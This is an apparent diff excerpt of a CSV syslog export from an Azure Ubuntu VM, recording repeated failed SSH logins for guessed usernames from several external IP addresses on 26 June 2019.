+6622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:31,UbuntuDevEnv,2019-06-26 17:01:31,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 55944:11: Normal Shutdown, Thank you for playing [preauth]",43874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,55944,,
+6623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:52,UbuntuDevEnv,2019-06-26 17:01:52,auth,UbuntuDevEnv,info,Invalid user html from 35.154.19.93 port 59224,43944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,html,35.154.19.9,59224,,
+6624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:52,UbuntuDevEnv,2019-06-26 17:01:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:52,UbuntuDevEnv,2019-06-26 17:01:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:54,UbuntuDevEnv,2019-06-26 17:01:54,auth,UbuntuDevEnv,info,Failed password for invalid user html from 35.154.19.93 port 59224 ssh2,43944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,html,35.154.19.9,59224,,
+6627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:55,UbuntuDevEnv,2019-06-26 17:01:54,auth,UbuntuDevEnv,info,Disconnected from invalid user html 35.154.19.93 port 59224 [preauth],43944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,html,35.154.19.9,59224,,
+6628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:55,UbuntuDevEnv,2019-06-26 17:01:54,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 59224:11: Normal Shutdown, Thank you for playing [preauth]",43944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,59224,,
+6629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:06,UbuntuDevEnv,2019-06-26 17:02:05,auth,UbuntuDevEnv,info,Invalid user marketing from 74.94.246.82 port 35452,44002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marketing,74.94.246.8,35452,,
+6630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:06,UbuntuDevEnv,2019-06-26 17:02:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:06,UbuntuDevEnv,2019-06-26 17:02:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,44002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:08,UbuntuDevEnv,2019-06-26 17:02:07,auth,UbuntuDevEnv,info,Failed password for invalid user marketing from 74.94.246.82 port 35452 ssh2,44002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marketing,74.94.246.8,35452,,
+6633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:08,UbuntuDevEnv,2019-06-26 17:02:07,auth,UbuntuDevEnv,info,Disconnected from invalid user marketing 74.94.246.82 port 35452 [preauth],44002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marketing,74.94.246.8,35452,,
+6634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:08,UbuntuDevEnv,2019-06-26 17:02:07,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 35452:11: Bye Bye [preauth],44002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,35452,,
+6635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:20,UbuntuDevEnv,2019-06-26 17:02:20,auth,UbuntuDevEnv,info,Invalid user bingo from 35.154.19.93 port 34276,44050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bingo,35.154.19.9,34276,,
+6636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:20,UbuntuDevEnv,2019-06-26 17:02:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:20,UbuntuDevEnv,2019-06-26 17:02:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:22,UbuntuDevEnv,2019-06-26 17:02:21,auth,UbuntuDevEnv,info,Failed password for invalid user bingo from 35.154.19.93 port 34276 ssh2,44050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bingo,35.154.19.9,34276,,
+6639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:22,UbuntuDevEnv,2019-06-26 17:02:21,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 34276:11: Normal Shutdown, Thank you for playing [preauth]",44050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,34276,,
+6640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:22,UbuntuDevEnv,2019-06-26 17:02:21,auth,UbuntuDevEnv,info,Disconnected from invalid user bingo 35.154.19.93 port 34276 [preauth],44050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bingo,35.154.19.9,34276,,
+6641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:27,UbuntuDevEnv,2019-06-26 17:02:26,auth,UbuntuDevEnv,info,Invalid user shuo from 80.108.220.67 port 51910,44054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuo,80.108.220.6,51910,,
+6642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:27,UbuntuDevEnv,2019-06-26 17:02:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,44054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+6643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:27,UbuntuDevEnv,2019-06-26 17:02:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:29,UbuntuDevEnv,2019-06-26 17:02:28,auth,UbuntuDevEnv,info,Failed password for invalid user shuo from 80.108.220.67 port 51910 ssh2,44054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuo,80.108.220.6,51910,,
+6645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:29,UbuntuDevEnv,2019-06-26 17:02:29,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 51910:11: Bye Bye [preauth],44054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,51910,,
+6646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:29,UbuntuDevEnv,2019-06-26 17:02:29,auth,UbuntuDevEnv,info,Disconnected from invalid user shuo 80.108.220.67 port 51910 [preauth],44054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuo,80.108.220.6,51910,,
+6647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:40,UbuntuDevEnv,2019-06-26 17:02:39,auth,UbuntuDevEnv,info,Invalid user setup from 81.0.212.18 port 48734,44135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,setup,81.0.212.1,48734,,
+6648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:40,UbuntuDevEnv,2019-06-26 17:02:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:40,UbuntuDevEnv,2019-06-26 17:02:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,44135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:42,UbuntuDevEnv,2019-06-26 17:02:41,auth,UbuntuDevEnv,info,Failed password for invalid user setup from 81.0.212.18 port 48734 ssh2,44135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,setup,81.0.212.1,48734,,
+6651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:42,UbuntuDevEnv,2019-06-26 17:02:41,auth,UbuntuDevEnv,info,Disconnected from invalid user setup 81.0.212.18 port 48734 [preauth],44135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,setup,81.0.212.1,48734,,
+6652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:42,UbuntuDevEnv,2019-06-26 17:02:41,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 48734:11: Bye Bye [preauth],44135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,48734,,
+6653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:44,UbuntuDevEnv,2019-06-26 17:02:44,auth,UbuntuDevEnv,info,Invalid user tinkerware from 77.237.69.165 port 38538,44151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,77.237.69.1,38538,,
+6654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:44,UbuntuDevEnv,2019-06-26 17:02:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,44151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+6655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:44,UbuntuDevEnv,2019-06-26 17:02:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:46,UbuntuDevEnv,2019-06-26 17:02:45,auth,UbuntuDevEnv,info,Failed password for invalid user tinkerware from 77.237.69.165 port 38538 ssh2,44151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,77.237.69.1,38538,,
+6657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:46,UbuntuDevEnv,2019-06-26 17:02:46,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 38538:11: Bye Bye [preauth],44151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,38538,,
+6658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:46,UbuntuDevEnv,2019-06-26 17:02:46,auth,UbuntuDevEnv,info,Disconnected from invalid user tinkerware 77.237.69.165 port 38538 [preauth],44151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,77.237.69.1,38538,,
+6659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:54,UbuntuDevEnv,2019-06-26 17:02:53,auth,UbuntuDevEnv,info,Invalid user bingo from 35.154.19.93 port 37580,44191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bingo,35.154.19.9,37580,,
+6660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:54,UbuntuDevEnv,2019-06-26 17:02:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:54,UbuntuDevEnv,2019-06-26 17:02:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:56,UbuntuDevEnv,2019-06-26 17:02:56,auth,UbuntuDevEnv,info,Failed password for invalid user bingo from 35.154.19.93 port 37580 ssh2,44191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bingo,35.154.19.9,37580,,
+6663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:56,UbuntuDevEnv,2019-06-26 17:02:56,auth,UbuntuDevEnv,info,Disconnected from invalid user bingo 35.154.19.93 port 37580 [preauth],44191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bingo,35.154.19.9,37580,,
+6664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:02:56,UbuntuDevEnv,2019-06-26 17:02:56,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 37580:11: Normal Shutdown, Thank you for playing [preauth]",44191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,37580,,
+6665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:27,UbuntuDevEnv,2019-06-26 17:03:27,auth,UbuntuDevEnv,info,Invalid user mongo from 35.154.19.93 port 40880,44305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mongo,35.154.19.9,40880,,
+6666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:27,UbuntuDevEnv,2019-06-26 17:03:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:27,UbuntuDevEnv,2019-06-26 17:03:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:29,UbuntuDevEnv,2019-06-26 17:03:29,auth,UbuntuDevEnv,info,Failed password for invalid user mongo from 35.154.19.93 port 40880 ssh2,44305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mongo,35.154.19.9,40880,,
+6669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:30,UbuntuDevEnv,2019-06-26 17:03:29,auth,UbuntuDevEnv,info,Disconnected from invalid user mongo 35.154.19.93 port 40880 [preauth],44305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mongo,35.154.19.9,40880,,
+6670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:30,UbuntuDevEnv,2019-06-26 17:03:29,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 40880:11: Normal Shutdown, Thank you for playing [preauth]",44305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,40880,,
+6671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:36,UbuntuDevEnv,2019-06-26 17:03:35,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 34066:11: Bye Bye [preauth],44317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,34066,,
+6672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:36,UbuntuDevEnv,2019-06-26 17:03:35,auth,UbuntuDevEnv,info,Disconnected from 171.8.199.77 port 34066 [preauth],44317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,34066,,
+6673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:36,UbuntuDevEnv,2019-06-26 17:03:35,auth,UbuntuDevEnv,info,Invalid user developer from 74.94.246.82 port 52658,44336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,74.94.246.8,52658,,
+6674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:36,UbuntuDevEnv,2019-06-26 17:03:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,44336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:36,UbuntuDevEnv,2019-06-26 17:03:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:38,UbuntuDevEnv,2019-06-26 17:03:38,auth,UbuntuDevEnv,info,Failed password for invalid user developer from 74.94.246.82 port 52658 ssh2,44336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,74.94.246.8,52658,,
+6677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:38,UbuntuDevEnv,2019-06-26 17:03:38,auth,UbuntuDevEnv,info,Disconnected from invalid user developer 74.94.246.82 port 52658 [preauth],44336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,74.94.246.8,52658,,
+6678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:03:38,UbuntuDevEnv,2019-06-26 17:03:38,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 52658:11: Bye Bye [preauth],44336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,52658,,
+6679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:00,UbuntuDevEnv,2019-06-26 17:04:00,auth,UbuntuDevEnv,info,Invalid user mongo from 35.154.19.93 port 44174,44422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mongo,35.154.19.9,44174,,
+6680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:00,UbuntuDevEnv,2019-06-26 17:04:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:00,UbuntuDevEnv,2019-06-26 17:04:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
